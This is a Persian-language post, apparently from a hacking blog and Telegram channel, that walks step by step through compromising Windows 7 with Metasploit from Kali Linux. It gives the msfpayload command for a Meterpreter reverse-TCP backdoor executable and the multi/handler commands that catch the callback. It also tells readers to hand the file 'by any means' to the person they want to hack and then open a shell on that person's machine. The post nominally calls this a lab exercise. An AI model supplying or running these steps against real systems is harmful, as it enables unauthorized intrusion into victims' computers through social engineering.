H a K c i N G 32

هک و امنیت

H a K c i N G 32

هک و امنیت

https://t.me/hacking32 =ادرس کانال تلگرام ما
H a K c i N G 32
نویسندگان

هک ویندوز در کالی لینوکس با ابزار متااسپلوییت

هک ویندوز 7  راهکارهای گوناگونی دارد . در این آزمایش قصد داریم نحوه هک ویندوز 7 با متااسپلوییت را به شما بیاموزیم . متااسپلوییت یکی از قوی ترین ابزارهای به کارگیری عیب های نرم افزار و هک می باشد . در این ابزار شما با استفاده از آسیب پذیری های تعریف شده ای که وجود دارد می توانید سیستم های ضعیف و پچ نشده را به کار گرفته و به آنها نفوذ کنید . در حقیقت متا اسپلوییت یک ابزار به منظور تست نفوذ برای امنیت شبکه است . متا اسپلوییت فریم ورکی گسترده است که دارای یک نسخه متن باز است که همگان می توانند از آن به صورت رایگان استفاده کنند.

و اما این آزمایش برای انجام این آزمایش ما از توزیع لینوکس کالی که خود آن یک ابزار تست نفوذ می باشد استفاده می کنیم . کالی لینوکس به صورت پیش فرض ابزار متا اسپلوییت را نصب شده و پیکربندی شده درون خود دارد و شما می توانید برای نفوذ از آن استفاده کنید . همچنین ما برای سیستم قربانی از یک ویندوز 7 استفاده می کنیم . فرض ما بر این است که شما هم اکنون یک محیط آزمایشگاهی آماده در داخل ماشین مجازی یا ماشین فیزیکی دارید که از طریق شبکه دو سیستم کالی لینوکس و ویندوز 7 نصب شده و با هم اتصال دارند و آموزش نصب و پیکربندی هر کدام از این دو خارج از سطح و حوصله این آموزش می باشد . آزمایش  هک ویندوز 7 با متااسپلوییت  را شروع می کنیم .

آزمایش  هک ویندوز 7 با متااسپلوییت

  • ویندوز 7 و کالی لینوکس خود را اجرا کنید .
  • به کالی رفته و خط فرمان را باز کنید و دستور msfconsole را وارد کنید تا وارد فریم ورک متا اسپلوییت شوید . دقت کنید که بنا به میزان فضای رم و سرعت سیستم ممکن است ابزار گسترده متا اسپلوییت کمی با تاخیر باز شود پس تا باز شدن آن منتظر بمانید .

  • پس از بالا آمدن متا اسپلوییت دستور
    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 X > Desktop/Backdoor.exe
    را وارد کنید . در این دستور آدرس آیپی 192.168.1.100 , آدرس آیپی سیستم کالی لینوکس بنده هست که من به صورت دستی آن را تعیین کرده ام . شما بایستی آدرس آیپی کالی خود را در این فرمان وارد کنید . اگر این آدرس را نمی دانید , با استفاده از دستور ifconfig درون خط فرمان این آیپی را بدست آورید و وارد دستور کنید .

hackwin1

  • این دستور موجب ایجاد یک بکدور بر روی دسکتاپ کالی لینوکس شما می شود که از آن به منظور نفوذ در سیستم ویندوز هفت استفاده خواهیم کرد .
  • حالا باید فایل ساخته شده را به هر طریقی به فردی که می خواهید اون رو هک کنید بدهید تا بر روی کامپیوترش نصب کند.
  • حالا دستور back  را بزنید تا به عقب باز گردیم

  • به کالی لینوکس و ابزار متا اسپلوییت باز گردید . دستور use exploit/multi/handler را وارد کنید تا ماژول handler فعال شود . برای استفاده از TCP معکوس دستور set payload windows/meterpreter/reverse_tcp را وارد کنید . برای تعیین آدرس آیپی که کانکشن معکوس ما را خواهد گرفت دستور set lhost 192.168.1.100 را وارد کنید (آدرس آیپی کالی است و واسه شما متفاوت است) . برای آغاز به کار ماژول handler دستور exploit -j -z را وارد کنید .

hackwin2

  • خوب یکبار دیگر به ویندوز هفت قربانی عزیز باز گردیم . این بار فرض کنید که قربانی فریب خورده و فایل بکدور (که قبلا دانلود کرده بود) را بر روی سیستم خود اجرا می کند . شما این کار را به صورت دستی انجام دهید .

  • به کالی و ابزار متا اسپلوییت بر گردید و ببینید که در آخر خط فرمان یک پیام جدید ظاهر شده که معنی آن این است که یک نشست جدید در داخل ماشین ویندوز 7 ما با آدرس آیپی 192.168.1.90 در زمان مربوطه آغاز گردیده است .

hackwin3

  • خوب شما برای تعامل با این نشست باز شده کافی است دستور sessions -i 1 را وارد کنید . ملاحظه می کنید که پیامی می دهد که تعامل با نشست شماره یک آغاز شد .

  • حالا برای مثال برای دسترسی به خط فرمان ویندوز 7 و دسترسی به فایل ها و پوشه ها دستور Shell را وارد کنید . ملاحظه می کنید که ما هم اکنون وارد مسیر خط فرمان ویندوز 7 شده ایم و به سیستم ویندوز 7 نفوذ کرده و به فایل های آن دسترسی داریم .

hackwin4

  • باور ندارید دستور dir را وارد کنید تا لیست فایل های موجود در پوشه فعلی را به شما نشان دهد .

hackwin5

  • آزمایش هک ویندوز 7 با متااسپلوییت  پایان پذیرفت  و اینگونه بود که ویندوز 7 در یک محیط ایزوله و آزمایشگاهی هک شد.
  • برای اشنایی با کد های meterpreter کافیست در گوگل سرچ کنید.

فیلم اموزشی = نمایش+دانلود

نظرات  (۰)

هیچ نظری هنوز ثبت نشده است
ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
شما میتوانید از این تگهای html استفاده کنید:
<b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
تجدید کد امنیتی